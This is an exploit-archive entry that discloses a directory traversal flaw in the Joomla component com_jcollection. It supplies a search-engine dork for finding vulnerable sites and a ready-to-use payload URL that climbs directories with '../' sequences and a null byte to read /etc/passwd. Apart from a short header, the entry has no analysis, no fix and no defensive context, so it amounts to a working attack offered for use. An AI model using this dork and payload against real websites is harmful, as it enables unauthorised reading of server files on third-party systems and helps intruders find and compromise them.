id: 10653
date: 01/10/2010
title: Joomla Component com_jcollection Directory Traversal
author: Fl0riX
cves: 

====================================================
Joomla Component com_jcollection Directory Traversal
====================================================


@~~=======================================~~@
@~~=Script : Joomla Component com_jcollection
 
@~~=Author : FL0RiX
 
@~~=Greez : Dost mu var?
 
@~~=Bug Type : Directory Traversal
 
@~~=Dork : inurl:"com_jcollection "
 
@~~=Note: Kimseye Hakettiginden Fazla Deger Vermeyeceksin.
 
@~~=======================================~~@
 
@~~=Vuln.
 
: http://site/ [Yol] /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00



#  0day.today [2023-03-25]  #